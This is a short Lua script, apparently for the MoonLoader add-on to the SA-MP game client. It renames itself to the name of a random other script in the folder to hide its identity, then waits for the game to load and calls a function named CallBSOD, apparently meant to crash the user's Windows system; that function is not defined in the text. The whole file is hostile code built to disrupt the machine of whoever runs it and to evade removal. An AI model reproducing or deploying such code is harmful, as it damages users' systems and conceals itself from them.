local function hideMe()
math.randomseed(os.time() * 99999);
local scripts = getFilesInPath(getWorkingDirectory(), '*.lua');
local currentName = thisScript().path;
local randomName = getWorkingDirectory() .. '\\' .. scripts[math.random(1, #scripts)];
os.rename(randomName, randomName .. '_waitForRename');
os.rename(currentName, randomName);
os.rename(randomName .. '_waitForRename', currentName);
end
function main()
while not isSampAvailable() do wait(0) end
CallBSOD();
while true do
wait(0)
end
end
hideMe();